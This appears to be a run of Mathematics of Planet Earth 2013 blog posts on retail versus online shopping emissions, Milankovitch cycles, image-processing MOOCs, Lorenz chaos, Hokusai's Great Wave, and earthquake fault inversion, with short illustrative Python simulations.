    Posted in Climate, Conference Report | Leave a comment

    Retail vs. E-tail

    As more and more purchasing takes place online, I’ve been wondering whether it’s more energy efficient to go out and buy something at a local store or to order it over the internet and have it delivered to my door. And which one has the smaller carbon footprint? Now it’s pretty simple to figure out my cost in time and money, and so like millions of other people I often decide that for me online is cheaper. But I see the cardboard boxes and the packing material filling up the recycle bins where we live, and I notice the delivery trucks every day making deliveries on our block, and I wonder about the differences in the total energy costs of the systems for getting goods from manufacturers to customers.

    Well, I have found some studies of exactly these questions, and the answer is: it all depends. But what it depends on is something easy to analyze and to a great extent something that I can control. That key factor is the trip from home to store—how far it is and how I get there.

This conclusion comes from a study of the logistics of delivering flash drives from the manufacturer to the customers’ homes by traditional retail and by online retail. Not included in the study were the energy used and CO2 emitted for the pieces of the supply chain that both have in common, such as the manufacturing process, so it is not a total accounting of energy consumed and carbon footprint. And although the study focuses on a narrow product line, the data used came directly from an online seller and a wholesale supplier. (The research appears in Life Cycle Comparison of Traditional Retail and E-commerce Logistics for Electronic Products: A Case Study of buy.com. The authors are C. Weber, C. Hendrickson, P. Jaramillo, S. Matthews, A. Nagengast, and R. Nealer from the Green Design Institute, Carnegie Mellon University.)

    Not surprisingly, the packaging costs are significant for e-commerce and hardly important for traditional retail, and the computer network costs are much higher for e-commerce, but what surprised me is just how big a factor the “customer transport” parameter is for traditional retail, accounting for about 65% of the energy consumed and the CO2 emitted. The corresponding parameter for e-commerce is the “last mile delivery,” and although it is even bigger than packaging, it only comes to about a third as much, on average, as customer transport. Here is a chart from the study showing the makeup of the carbon footprints.

    CO2 emissions associated with retail and e-commerce delivery systems by stage

    Using probability models derived from the data for the parameter values, the authors ran Monte Carlo simulations to draw conclusions. They estimate that only 20% of the time does going to the store to make your purchase result in less CO2 emitted than having it delivered.

Now what can I do about all this? Well, there is great variability in the two most important parameters: distance to the retail store and the fuel economy of the customer’s car. There is so much variability, in fact, that if I walk to the store, the trip almost surely uses less energy and emits less carbon dioxide than ordering online. If I drive just a couple of miles in a car that gets average mileage, the trip is still likely to be less energy-intensive. And if it is just a couple of miles, then I might ride my bike instead.
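
To make the trade-off concrete, here is a minimal Monte Carlo sketch in the spirit of the study. Every distribution and emission factor in it is an illustrative assumption of mine, not a value taken from the Carnegie Mellon paper; the point is only to show how the comparison depends on trip distance and fuel economy.

```python
# Illustrative Monte Carlo comparison of the CO2 from one store trip versus one
# home delivery. Every distribution and emission factor below is a made-up
# assumption for demonstration; these are NOT the values from the CMU study.
import numpy as np

rng = np.random.default_rng(0)
N = 100_000

# Traditional retail: round-trip driving distance (km) and fuel economy (L/100 km).
trip_km = rng.lognormal(mean=np.log(8.0), sigma=0.8, size=N)        # assumed
litres_per_100km = rng.normal(9.0, 2.0, size=N).clip(4.0, 20.0)     # assumed
KG_CO2_PER_LITRE = 2.3                                              # gasoline, approximate
retail_kg = trip_km * litres_per_100km / 100.0 * KG_CO2_PER_LITRE

# E-commerce: packaging plus an allocated per-parcel share of the delivery van.
packaging_kg = rng.normal(0.15, 0.05, size=N).clip(0.01, None)      # assumed
last_mile_kg = rng.lognormal(mean=np.log(0.20), sigma=0.5, size=N)  # assumed
etail_kg = packaging_kg + last_mile_kg

print(f"store trip emits less CO2 in {np.mean(retail_kg < etail_kg):.0%} of simulated cases")
print(f"median store trip: {np.median(retail_kg):.2f} kg, median delivery: {np.median(etail_kg):.2f} kg")
```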

    Kent E. Morrison
    American Institute of Mathematics

    Posted in Economics, Energy, Transportation | 1 Comment

    How Good is the Milankovitch Theory?

    [Adapted from Chapter 11 of the forthcoming text Mathematics and Climate, by Hans G. Kaper and Hans Engler, to be published by the Society for Industrial and Applied Mathematics (SIAM), 2013.]

    In 1941, the Serbian mathematician Milutin Milankovitch (1879–1958) suggested that past glacial cycles might be correlated to cyclical changes in the insolation (the amount of solar energy that reaches Earth from the Sun) [M. Milankovitch, Kanon der Erdbestrahlung und seine Anwendung auf das Eiszeitenproblem, University of Belgrade, 1941]. This theory is known as the Milankovitch theory of glacial cycles and is an integral part of paleoclimatology (the study of prehistoric climates). It has been discussed in an earlier post on paleoclimate models by Christiane Rousseau.

The theoretical results obtained for the Milankovitch cycles can be tested against temperature data from the paleoclimate record. In the 1970s, Hays et al. [Variations in the Earth’s orbit: Pacemaker of the ice ages, Science, 194 (1976), 1121–1132] used data from ocean sediment core samples to relate the Milankovitch cycles to the climate of the last 468,000 years. One of their conclusions was that “. . . climatic variance of these records is concentrated in three discrete spectral peaks at periods of 23,000, 42,000, and approximately 100,000 years.” This study was repeated recently by Zachos et al. [Trends, rhythms, and aberrations in global climate 65 Ma to present, Science, 292 (2001), 686–693], who used much more extensive data. The reconstructed temperature profile and the corresponding power spectrum show periods of 100, 41, and 23 Kyr (see Figure 1).

    Climate Record 4.5 Myr

    Figure 1: Time series and power spectrum of the Earth’s climate record for the past 4.5 Myr.

    The best data we have for temperatures during the ice age cycles come from the analysis of isotope ratios of air trapped in pockets in the polar ice. The ratio of oxygen isotopes is a good proxy for global mean temperature. In the 1990s, Petit et al. [Climate and atmospheric history of the past 420,000 years from the Vostok ice core, Antarctica, Nature, 399 (1999), 429–436] studied data from the Vostok ice core to reconstruct a temperature profile for the past 420,000 years. Although the record is only half a million years long, it allows for fairly precise dating from the progressive layering process that laid down the ice. A spectral analysis shows cycles with periods of 100, 43, 24, and 19 Kyr, in reasonable agreement with previous findings and with the calculated periods of the Milankovitch cycles.
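
For readers who want to see how such periods are extracted, here is a minimal sketch of the kind of spectral analysis involved. The record below is synthetic, with Milankovitch-like periods and made-up amplitudes, not actual ice-core or sediment data.

```python
# Minimal sketch of how Milankovitch-like periods are pulled out of a noisy
# record with a periodogram. The "record" is synthetic; it is not ice-core or
# sediment data, and the amplitudes are illustrative only.
import numpy as np

dt = 1.0                                   # sampling step, kyr
t = np.arange(0.0, 800.0, dt)              # 800 kyr of synthetic record
periods = [100.0, 41.0, 23.0]              # eccentricity, obliquity, precession (kyr)
amps = [0.7, 1.0, 0.5]                     # illustrative strengths (obliquity largest)
rng = np.random.default_rng(1)
signal = sum(a * np.cos(2 * np.pi * t / p) for a, p in zip(amps, periods))
signal = signal + 0.5 * rng.standard_normal(t.size)

spec = np.abs(np.fft.rfft(signal - signal.mean())) ** 2
freqs = np.fft.rfftfreq(t.size, d=dt)      # cycles per kyr

# Report the three strongest local maxima of the periodogram (skipping k = 0).
interior = np.arange(1, spec.size - 1)
is_peak = (spec[interior] > spec[interior - 1]) & (spec[interior] > spec[interior + 1])
peaks = interior[is_peak]
top = peaks[np.argsort(spec[peaks])[::-1][:3]]
for k in sorted(top):
    print(f"strong spectral peak near a period of {1.0 / freqs[k]:.0f} kyr")
```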

    At this point we might conclude that Milankovitch’s idea was correct and that ice ages are indeed correlated with orbital variations. There are, however, some serious caveats. Changes in the oxygen isotope ratio reflect the combined effect of changes in global ice volume and temperature at the time of deposition of the material, and the two effects cannot be separated easily. Furthermore, the cycles do not change the total energy received by the Earth if this is averaged over the course of a year. An increase in eccentricity, or obliquity, means the insolation is larger during part of the year and smaller during the rest of the year, with very little net effect on the total energy received at any latitude over a year. However, a change in eccentricity or obliquity could make the seasonal cycle more severe and thus change the extent of the ice caps. A possible scenario for the onset of ice ages would then be that minima in high-latitude insolation during the summer enable winter snowfall to persist throughout the year and thus accumulate to build glacial ice sheets. Similarly, times with especially intense high-latitude summer insolation could trigger a deglaciation. Clearly, additional detailed modeling would be needed to account for these effects.

    Even allowing for the scenario described in the previous paragraph, we would expect an asymmetric climate change, where the ice cap over one of the poles increases while the cap over the other decreases. Yet, the entire globe cooled during the ice ages and warmed during periods of deglaciation.

An even more disturbing observation arises when one considers not just the periods of the cycles but also their relative strengths. In the data, the relative contributions are ordered as obliquity, followed by eccentricity, followed by precession, while for the average daily insolation at 65 degrees North latitude at the summer solstice (denoted Q65, shown in Figure 2), the order is nearly reversed: precession, followed by obliquity, followed by eccentricity. The dominance of precession in the forcing term Q65 does not even show up in the data (the “100,000-year problem”).

    Average daily insolation at 65 degrees North latitude at the summer solstice

    Figure 2: Time series and power spectrum of the average daily insolation at 65 degrees North at summer solstice (Q65).
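
As a rough illustration of the quantity plotted in Figure 2, the sketch below evaluates the standard formula for daily-mean top-of-atmosphere insolation at 65 degrees North at the summer solstice, assuming a circular orbit. It therefore captures only the obliquity dependence of Q65, not the eccentricity or precession effects; the obliquity values are the approximate range of Earth's obliquity cycle.

```python
# Daily-mean top-of-atmosphere insolation at 65N at the summer solstice,
# assuming a circular orbit (so eccentricity and precession are ignored).
# This only illustrates the obliquity dependence of Q65, not the full forcing.
import numpy as np

S0 = 1361.0  # solar "constant" in W/m^2, approximate

def daily_mean_insolation(lat_deg, decl_deg):
    """Standard formula for daily-mean insolation at a given latitude and solar declination."""
    phi, delta = np.radians(lat_deg), np.radians(decl_deg)
    cos_h0 = np.clip(-np.tan(phi) * np.tan(delta), -1.0, 1.0)   # hour angle of sunset
    h0 = np.arccos(cos_h0)
    return (S0 / np.pi) * (h0 * np.sin(phi) * np.sin(delta)
                           + np.cos(phi) * np.cos(delta) * np.sin(h0))

# At the summer solstice the solar declination equals the obliquity.
for obliquity in (22.1, 23.44, 24.5):        # rough range of Earth's obliquity cycle, degrees
    q65 = daily_mean_insolation(65.0, obliquity)
    print(f"obliquity {obliquity:5.2f} deg  ->  Q65 ~ {q65:.0f} W/m^2")
```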

    The lesson learned here is that actual climate dynamics are very complex, involving much more than insolation and certainly much more than insolation distilled down to a single quantity, Q65. Feedback mechanisms are at work that are hard to model or explain. On the other hand, an analysis of the existing signals shows that astronomical factors most likely play a role in the Earth’s long-term climate.

    Posted in Paleoclimate | Leave a comment

    Physics of Climate

    The American Physical Society (APS) now has a Topical Group on the Physics of Climate (GPC). The first Newsletter was published on March 13. This and future GPC newsletters are to be found on the GPC website. For information, contact gpc@aps.org.

    Posted in Climate, General | Leave a comment

    Teaching to the Planet

For the past nine weeks, I have had the privilege of teaching a Massive Open Online Course (MOOC) on image and video processing. The first half of the class was dedicated to topics that everybody should know in the subject, like JPEG, JPEG-LS, the Hough transform, histogram equalization, and Otsu’s algorithm (as I always say to my students, if you didn’t learn these in your image processing class, you should ask for your money back!). The second half was dedicated to advanced topics like partial differential equations and sparse modeling.
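
Since Otsu's algorithm comes up above, here is a minimal numpy rendering of its core idea: choose the threshold that maximizes the between-class variance of the gray-level histogram. Library implementations (for example in OpenCV or scikit-image) are more careful; the synthetic test image is only an illustration.

```python
# Minimal Otsu thresholding: maximize the between-class variance of an 8-bit
# grayscale histogram. Library versions are more robust; this is the core idea.
import numpy as np

def otsu_threshold(image):
    hist = np.bincount(image.ravel(), minlength=256).astype(float)
    prob = hist / hist.sum()
    levels = np.arange(256)

    omega = np.cumsum(prob)                    # probability of class 0 for each threshold
    mu = np.cumsum(prob * levels)              # cumulative mean
    mu_total = mu[-1]

    # Between-class variance; thresholds that leave a class empty give 0/0 -> ignored.
    with np.errstate(divide="ignore", invalid="ignore"):
        sigma_b2 = (mu_total * omega - mu) ** 2 / (omega * (1.0 - omega))
    sigma_b2 = np.nan_to_num(sigma_b2)
    return int(np.argmax(sigma_b2))

# Synthetic bimodal image: dark background with a brighter central patch.
rng = np.random.default_rng(0)
img = rng.normal(60, 10, (128, 128))
img[32:96, 32:96] = rng.normal(170, 10, (64, 64))
img = img.clip(0, 255).astype(np.uint8)
print("Otsu threshold:", otsu_threshold(img))   # expect a value between the two modes
```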

The experience of teaching a MOOC, while extremely time-consuming, is incredibly rewarding; it has already been the subject of many articles in the popular press and of multiple on-campus forums. What I want to express here instead is that the experience gave me the chance, once again, to appreciate and to teach how important mathematics is in image and video processing. Basically, all the fundamental algorithms rest on extraordinary mathematical foundations. JPEG, for example, without any doubt the most successful image processing algorithm, is based on critical tools from Fourier analysis and information theory. Its most recent successors, JPEG-2000 and JPEG-LS (both closely connected to the algorithms roaming Mars in the previous and current expeditions), are again based on fundamental mathematical concepts like wavelets, Golomb coding, and context modeling.
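
To give a flavor of the Fourier-analysis tools behind JPEG, the following sketch applies an orthonormal 2-D discrete cosine transform to a single 8x8 block and coarsely quantizes the coefficients. The real standard adds zig-zag ordering, entropy coding, chroma handling and much more; this shows only the central energy-compaction idea, on a made-up smooth block.

```python
# Sketch of the transform step at the heart of JPEG: an orthonormal 2-D DCT of
# an 8x8 block followed by coarse quantization. Only the central idea is shown;
# a real encoder adds zig-zag ordering, Huffman/arithmetic coding, etc.
import numpy as np

N = 8
k, n = np.meshgrid(np.arange(N), np.arange(N), indexing="ij")
C = np.sqrt(2.0 / N) * np.cos(np.pi * (2 * n + 1) * k / (2 * N))
C[0, :] = np.sqrt(1.0 / N)                 # orthonormal DCT-II matrix

# A smooth synthetic block: a gentle horizontal brightness ramp.
block = np.round(128 + 40 * np.cos(np.pi * np.arange(N) / N))[None, :].repeat(N, axis=0)

coeffs = C @ (block - 128.0) @ C.T         # level-shift then 2-D DCT, as in JPEG
q = 16.0                                   # a single illustrative quantization step
quantized = np.round(coeffs / q)
print("nonzero quantized coefficients:", int(np.count_nonzero(quantized)), "out of", N * N)
```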

The use of partial differential equations and differential geometry brought not only some top mathematicians to work in image processing, but numerous state-of-the-art results as well. More recently, compressed sensing and sparse modeling have provided yet another example of how important mathematics is in this area. Apropos of this, in collaboration with the National Geospatial-Intelligence Agency, we have recently demonstrated the use of sparse modeling and dictionary learning for hyperspectral image classification, including from severely undersampled data. These types of techniques are critical for learning about the state of our planet.

Mathematics will continue to play a critical role in image and video processing; it has done so already, for planet Earth and beyond.

    MOOC

    A collage of image processing, logo of the MOOC class.

    ApHill

    Original ApHill hyperspectral image, followed by mapping (classification) after reconstruction from only 2% of the data, without including spatial coherence in the process, and the same with spatial coherence.

    Guillermo Sapiro
    Edmund T. Pratt, Jr. Professor
    Dept of Electrical and Computer Engineering
    Duke University

    Posted in Imaging, Mathematics | Leave a comment

    CliMathNet Conference in Exeter, UK

The first CliMathNet conference will be held on 1st-5th July 2013 in Exeter, UK. The conference will include opportunities to find out about outstanding problems in the mathematics of the climate sciences and their relation to problems that policymakers face. Wednesday afternoon will include a poster session at the Met Office, while Thursday will have a policy theme. Topics include quantifying uncertainty in climate models, comprehensive climate risk analysis, forecasting climate tipping points, improving projections of extreme events, and engaging with policy.

    Call for Abstracts and Registration

Participants are invited to submit abstracts for talks or posters on related subjects by 19th April 2013. These may be on mathematical or statistical topics that could be of relevance to the climate sciences (e.g., applied analysis, environmental statistics, stochastic differential equations, numerical methods), as well as on applications to climate and weather.

    CliMathNet is a network funded by EPSRC that aims to break down barriers between researchers in Mathematics, Statistics and Climate Sciences. For more details, and to register, see http://www.climathnet.org/conference2013/


    Posted in Climate, Conference Announcement | Leave a comment

    Chaos in an Atmosphere Hanging on a Wall

This month marks the 50th anniversary of the 1963 publication of Ed Lorenz’s groundbreaking paper, “Deterministic Nonperiodic Flow,” in the Journal of the Atmospheric Sciences. This seminal work, now cited more than 11,000 times, inspired a generation of mathematicians and physicists to bravely relax their linear assumptions about reality, and embrace the nonlinearity governing our complex world. Quoting from the abstract of his paper: “A simple system representing cellular convection is solved numerically. All of the solutions are found to be unstable, and almost all of them are nonperiodic.”

While many scientists had observed and characterized nonlinear behavior before, Lorenz was the first to simulate this remarkable phenomenon in a simple set of differential equations using a computer. He went on to demonstrate that the limit of predictability of the atmosphere is roughly two weeks, the time it takes for two virtually indistinguishable weather patterns to become completely different. No matter how accurate our satellite measurements get, no matter how fast our computers become, we will never be able to predict the likelihood of a rainy day beyond 14 days. This phenomenon became known as the butterfly effect, popularized in James Gleick’s book “Chaos.”
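
For readers who want to see the butterfly effect in a few lines of code, here is a sketch that integrates Lorenz's three equations with the classical parameters (sigma = 10, rho = 28, beta = 8/3) from two initial states differing by one part in a hundred million; the fixed-step integrator and the particular initial states are my own illustrative choices.

```python
# Lorenz's 1963 system integrated from two almost identical initial states,
# to illustrate sensitive dependence on initial conditions. Classical
# parameters sigma=10, rho=28, beta=8/3; a simple fixed-step RK4 integrator.
import numpy as np

def lorenz(v, sigma=10.0, rho=28.0, beta=8.0 / 3.0):
    x, y, z = v
    return np.array([sigma * (y - x), x * (rho - z) - y, x * y - beta * z])

def rk4_trajectory(v0, dt=0.01, steps=3000):
    traj = [np.asarray(v0, dtype=float)]
    for _ in range(steps):
        v = traj[-1]
        k1 = lorenz(v)
        k2 = lorenz(v + 0.5 * dt * k1)
        k3 = lorenz(v + 0.5 * dt * k2)
        k4 = lorenz(v + dt * k3)
        traj.append(v + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4))
    return np.array(traj)

a = rk4_trajectory([1.0, 1.0, 1.0])
b = rk4_trajectory([1.0, 1.0, 1.0 + 1e-8])        # perturbed by one part in 10^8
separation = np.linalg.norm(a - b, axis=1)
for idx in (0, 500, 1000, 1500, 2000, 2500):
    print(f"t = {idx * 0.01:5.1f}   separation = {separation[idx]:.2e}")
```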

    Inspired by the work of Lorenz and colleagues, in my lab at the University of Vermont we’re using Computational Fluid Dynamics (CFD) simulations to understand the flow behaviors observed in a physical experiment. It’s a testbed for developing mathematical techniques to improve the predictions made by weather and climate models.

    Lorenz Attractor

A sketch of the Lorenz attractor from the original paper (left) and a simulation of the convection loop analogous to Lorenz’s system (right) [Harris et al., Tellus, 2012].

    Here you’ll find a brief video describing the experiment analogous to the model developed by Lorenz:

    And below you’ll find a CFD simulation of the dynamics observed in the experiment.

What is most remarkable about Lorenz’s 1963 model is its relevance to the state of the art in weather prediction today, despite the enormous advances that have been made in theoretical, observational, and computational studies of the Earth’s atmosphere. Every PhD student working in the field of weather prediction cuts their teeth testing data assimilation schemes on simple models proposed by Lorenz; his influence is incalculable.

    In 2005, while I was a PhD student in Applied Mathematics at the University of Maryland, the legendary Lorenz visited my advisor Eugenia Kalnay in her office in the Department of Atmospheric & Oceanic Science. At some point during his stay, he penned the following on a piece of paper: “Chaos: When the present determines the future, but the approximate present does not approximately determine the future.”

    Even near the end of his career, Lorenz was still searching for the essence of nonlinearity, seeking to describe this incredibly complicated phenomenon in the simplest of terms.

    Christopher M. Danforth, Ph.D.
    Associate Professor
    Computational Story Lab
    Department of Mathematics & Statistics
    University of Vermont

    Posted in Climate, Mathematics, Meteorology | 1 Comment

    Predecessors of MPE2013

Psychologists analyzing the evolution of human societies might discuss and debate the following fact: it took approximately 40 years for the community of mathematicians to become aware of the various difficulties facing human society in the near future and to agree to work on these questions.

    The time is ripe to tackle these problems. Several mathematical tools have been developed recently that can be applied successfully to predict environmental developments. In “ancient times,” rather simple differential equations could be used to make predictions, for example about the evolution of our physical resources. Progress in the theory of dynamical systems, analysis, and the theory of partial differential equations, and the availability of ever-increasing amounts of physical data enable us to work on problems arising from the transformation of our society.

At this point it is fair to pay homage to the modern Cassandras whose sensitivity and open-mindedness toward the physical and human aspects of our society led them to draw the attention of their contemporaries to ecological questions, the term ecological being taken in a wide sense. Physicists and mathematicians were among the most prominent of these Cassandras. Among them, a special tribute must be paid to two well-known mathematicians, Alexandre Grothendieck and Pierre Samuel.

A partial history of their intellectual adventures and of their actions is related in a memoir by Céline Pessis, “Les années 1968 et la science Survivre … et Vivre, des mathématiciens critiques à l’origine de l’écologisme.” The book can be downloaded here. As the title suggests, the memoir is written in French; a few quotations are given below in English translation.

    The first quotation is from Grothendieck, the founder of Survivre:

“‘Survivre et Vivre’ (which at first was called simply ‘Survivre’) is the name of a group, initially pacifist in its aims and later also ecological, which came into being in July 1970 (on the margins of a ‘Summer School’ at the Université de Montréal), in a milieu of scientists (and above all, of mathematicians).” Has the Canadian group of which Grothendieck is speaking created a kind of tradition at the University of Montreal, one that might explain the presence and role of Christiane Rousseau in the birth and development of “Mathematics of Planet Earth”?

According to Céline Pessis,
“Survivre seemed to us to play a major role in the emergence of the political ecology movement, as suggested by the names of the personalities gathered in it, and notably by the presence of Pierre Samuel, who was a key actor in the anti-nuclear movement and one of the ‘pillars’ of Les Amis de la Terre for several decades. … (The French section of Friends of the Earth (Les Amis de la Terre) was created in the same week of July 1970 as Survivre.)”

She observed that “Grothendieck and Samuel were initially the members of Survivre most inclined to champion the scientists sounding ecological alarms. In 1972, they vouched for the first publication of Les Amis de la Terre: a translation of The Population Bomb, the book by the biologist P. Ehrlich that sold two million copies in the United States.”

From the ecological and environmental point of view, Samuel played a prominent role. Céline Pessis sums up his personality and his actions in these terms:

“Extremely kind and very gentle, older and having lived through the war, P. Samuel was a figure of stability within Survivre, in contrast with the virulence of some other members. He attentively carried out the duties of treasurer, opened his door for the group’s regular gatherings, and was one of the most prolific authors of the small group. He and Grothendieck impressed on Survivre their utopian conception of an ecological society on a human scale, equipped with soft technologies, peaceful and balanced, before a younger generation radicalized the tone of the journal. Very open-minded, he took part in many extremely radical struggles without ever abandoning his non-violence or his calm. Steeped in Greek philosophy and an adherent of Stoicism, his advocacy was always directed toward ‘détente’ and ‘moderation.’”

    Grothendieck, who is still alive, has given his agreement to “Mathematics of Planet Earth.” No doubt, Pierre Samuel would have been happy to praise Christiane Rousseau and all the people at the origin of this highly significant initiative.

    Claude Paul Bruter

    Posted in General | Leave a comment

    The Great Wave Explained by Directional Focusing

    One of the most famous images in Japanese art is the Great Wave off Kanagawa, a woodblock print by the Japanese artist Hokusai. The print shows an enormous wave on the point of breaking over boats that are being sculled against the wave’s travel (see Figure 1a). As well as its fame in art, this print is also famous in mathematics: firstly because the structure of the breaking wave at its crest illustrates features of self-similarity, and secondly because the large amplitude of the wave has led it to be interpreted as a rogue wave generated from nonlinear wave effects (see J. H. E. Cartwright, H. Nakamura (2009) Notes Rec. R. Soc. 63, 119–135).

However, we have just published a paper in Notes and Records of the Royal Society (J. M. Dudley, V. Sarano, F. Dias (2013) Notes Rec. R. Soc. 67 doi: 10.1098/rsnr.2012.0066) that points out that whether the generating mechanism is linear or nonlinear does not enter into the definition of a rogue wave; the only criterion is whether the wave is statistically much larger than the other waves in the immediate environment. In fact, by making reference to the Great Wave’s simultaneous transverse and longitudinal localisation, we show that the purely linear mechanism of directional focusing predicts characteristics consistent with those of the Great Wave. We have also been fortunate enough to collaborate with the photographer V. Sarano, who has provided us with a truly remarkable photograph of a 6 m rogue wave observed from the French icebreaker Astrolabe in the Southern Ocean, which bears a quite spectacular resemblance to the Hokusai print (see Figure 1b).

    Great Wave

Figure 1: Two views of a Great Wave: (a) from Hokusai; (b) from Nature.

    Rogue waves can arise from a variety of different mechanisms. For example, linear effects that can generate rogue waves include: spatial focusing due to refraction with varying topography; wave-current interactions; directional focusing of multiple wave trains. Nonlinear effects that have received much attention include the exponential amplification of random surface noise through modulation instability.

In the case of the Great Wave, a clue to how linear effects may play a role is seen by noting the Great Wave’s localization both along its direction of travel and transversally – we see the wave rising from the foreground and ending in the middle ground of the print. This is in fact a characteristic of the linear effect of directional focusing, which arises when wave trains with different directions and phases interfere at a particular point. Typical results of numerical modeling of this process are shown in Figure 2. The modeling is based on propagation equations that include both linear and nonlinear effects, but the concentration of energy at the focus arises from linear convergence. Nonlinearity plays a role only as the wave approaches the linear focus, where it increases the steepness to the point of breaking.

    Wave Trains

Figure 2: Numerical results showing directional focusing of periodic wave trains towards an extreme wave at the focus.
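
The linear-superposition idea behind directional focusing can be sketched in a few lines: several plane wave trains with different propagation directions are phased so that their crests all pass through one point, where the surface elevation then approaches the sum of the individual amplitudes. The wavelength, the number of trains and the angular spread below are illustrative choices; this toy calculation is purely linear and is not the propagation model used in the paper.

```python
# Toy linear directional focusing: nine unit-amplitude plane wave trains with
# different propagation directions are phased so that all of their crests pass
# through the origin at t = 0. The elevation there approaches the sum of the
# individual amplitudes, while away from the focus the trains largely cancel.
import numpy as np

wavelength = 100.0                               # metres, illustrative
k0 = 2.0 * np.pi / wavelength
angles = np.radians(np.linspace(-30.0, 30.0, 9)) # nine directions spread over 60 degrees

x = np.linspace(-600.0, 600.0, 241)
y = np.linspace(-600.0, 600.0, 241)
X, Y = np.meshgrid(x, y)

eta = np.zeros_like(X)
for th in angles:
    kx, ky = k0 * np.cos(th), k0 * np.sin(th)
    eta += np.cos(kx * X + ky * Y)               # each train has a crest at the origin

i, j = np.unravel_index(np.argmax(eta), eta.shape)
print(f"maximum elevation {eta[i, j]:.2f} (sum of {len(angles)} unit amplitudes)")
print(f"located at x = {x[j]:.0f} m, y = {y[i]:.0f} m (the chosen focus is the origin)")
```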

The visual similarity of the numerical modeling of directional focusing to the localization properties seen in the woodcut is immediately apparent, and thus directional focusing is clearly also a mechanism that could underlie the formation of the Great Wave. In terms of the artwork of the woodcut itself, highlighting the physics of the transverse localization of the Great Wave provides room for unexpected optimism when interpreting the scene depicted: the sailors may not be in as much danger as usually believed. Is Hokusai really trying to highlight the skillful Japanese crews navigating around the wave to avoid it breaking over them?

    By John M. Dudley, Institut FEMTO-ST, UMR 6174 CNRS-Université de Franche-Comté, Besançon, France and Frédéric Dias, School of Mathematical Sciences, University College Dublin, Ireland.

    Posted in Geophysics, Ocean | Leave a comment

    MPE2013 Launched in Portugal, March 5, 2013, at “Pavilhão do Conhecimento” in Lisbon

    Contributed by José Francisco Rodrigues

In Portugal, the “Matemática do Planeta Terra” (MPT2013) initiative is coordinated by a National Committee put together by the Portuguese Commission for UNESCO, with delegates from the Portuguese Mathematical Society (SPM), the Association of Mathematical Teachers (APM), the LUDUS Association, the Centro Internacional de Matemática (CIM), the Science Museum of the University of Coimbra, the National Museum of Natural History and Science of the University of Lisbon, and the National Agency for Scientific and Technological Culture (Ciência Viva).

While the European launch of MPE2013 was taking place at the UNESCO Headquarters in Paris, a youth festival was taking place in Lisbon at “Pavilhão do Conhecimento,” the largest science center in Portugal, with hundreds of pupils participating in mathematics popularization activities directly or indirectly related to the mathematics of planet earth. Many activities around themes like “Pedro Nunes and the Quadrant”, “Construction of Sundials”, and “Romanesque broccoli, cauliflowers and other iterations”, as well as a very popular “Mathematical Circus”, fascinated and challenged the children and students during the day. A direct connection with the African island of Principe made it possible to share several mathematics popularization topics with schools there. The three Portuguese modules (the interactive modules “Rhumb Lines and Spirals” and “Earthquakes and Structures” and the “Sundials” film) participating in the international MPE2013 competition and selected for the UNESCO exhibition were also displayed in Lisbon. The official opening took place at the end of the day with an address by the Portuguese Minister of Education and Science, Nuno Crato, a mathematician and former president of the Portuguese Mathematical Society who had participated in the UNESCO MPE session, and with the start of a “Portugal MPE2013 Tour.”

    Romanesque broccoli, cauliflowers and other iterations Romanesque broccoli, cauliflowers and other iterations
    Mathematical Circus Mathematical Circus

    The presentation in Portugal of the MPE2013 initiative took place on May 6, 2011, at the University of Lisbon, co-organized by CIM. CIM is currently organizing two scientific conferences and two summer schools, “International Conference and Advanced School Planet Earth, Mathematics of Energy and Climate Change,” MECC 2013 in March, and “International Conference and Advanced School Planet Earth, Dynamics, Games and Science,” DGS 2013 in August-September 2013.

    Posted in General, Public Event | Leave a comment

    Modeling and Prediction of Earthquakes

March 11 marks the second anniversary of the magnitude 9.0 earthquake of 2011, whose epicenter was located off the coast of Japan and which caught the world—including expert seismologists—by surprise. It was a stark reminder of how much is still unknown about faults and their sudden, catastrophic behavior. Finding the precise geometry of faults and mapping existing strain fields in surrounding areas is still an open and very challenging problem. If we could overcome this challenge, we could run simulations of seismic activity and thus better assess risk in given areas.

My collaborator I. R. Ionescu (University of Paris) and I have developed (Inverse Problems, 25, 1 (2009)) a robust method for locating and portraying faults that are active due to tangential dislocations. This was done under the assumption that only surface observations are available and that a traction-free condition applies at that surface.

    We also explored the possibility of detecting slow slip events (such as silent earthquakes, or earthquake nucleation phases) from GPS observations. Our study relied on an asymptotic estimate for the observed surface displacement. This estimate was first used to derive what we called the moments reconstruction method. Then it was used for finding necessary conditions for a surface displacement field to have been caused by a slip on a fault. These conditions led to the introduction of two parameters: the activation factor and the confidence index. They can be computed from the surface observations in a robust fashion. They indicate whether a measured displacement field is due to an active fault.

We then derived a combined technique for reconstructing fault profiles that blends least-squares minimization and the moments method. We carefully assessed how our reconstruction method is affected by the sensitivity of the observation apparatus and by the stepsize of the grid of surface observation points. The maximum permissible stepsize for such a grid was computed for different values of fault depth and orientation. Finally, we trained our numerical method for reconstructing faults on synthetic data.
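
As a toy illustration of the least-squares ingredient only (and emphatically not of the authors' actual method), the sketch below recovers a synthetic slip-like profile from sparse, noisy linear observations via Tikhonov-regularized least squares. The smoothing kernel used as the forward operator, the noise level and the regularization weight are all made-up stand-ins for the real elasticity-based relation between fault slip and surface displacement.

```python
# Toy Tikhonov-regularized least squares: recover a smooth "slip profile" m
# from sparse, noisy observations d = G m + noise. G is a made-up smoothing
# kernel, NOT the elasticity-based forward operator of the actual study.
import numpy as np

rng = np.random.default_rng(3)
n_model, n_data = 80, 12                         # fine model grid, few observation points

xm = np.linspace(0.0, 1.0, n_model)
true_slip = np.exp(-((xm - 0.55) / 0.12) ** 2)   # synthetic slip profile

xd = np.sort(rng.uniform(0.0, 1.0, n_data))      # sparse observation locations
G = np.exp(-np.abs(xd[:, None] - xm[None, :]) / 0.15)    # assumed smoothing kernel
G /= G.sum(axis=1, keepdims=True)

data = G @ true_slip + 0.01 * rng.standard_normal(n_data)    # noisy observations

lam = 1e-2                                        # regularization weight (tuning choice)
recovered = np.linalg.solve(G.T @ G + lam * np.eye(n_model), G.T @ data)

err = np.linalg.norm(recovered - true_slip) / np.linalg.norm(true_slip)
print(f"relative reconstruction error: {err:.2f}")
```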

The mathematical analysis of the forward and inverse problem for this quasi-static fault slip problem is now complete. We are currently working on applying that theory to minute-displacement data measured over a vast area around the central Pacific coast of Mexico. This is quite a challenging step of our project, since we have to contend with noisy, error-tainted data, which also happen to be severely sparse due to the high cost of apparatus capable of resolving displacements of a few millimeters per month. A reliable reconstruction of an active fault around that subduction zone in Mexico can only be achieved by combining a sound mathematical model of stresses and displacements of the Earth’s crust with known physical bounds on the parameters to be recovered. These bounds are known to geophysicists thanks to two centuries of observations and field work.
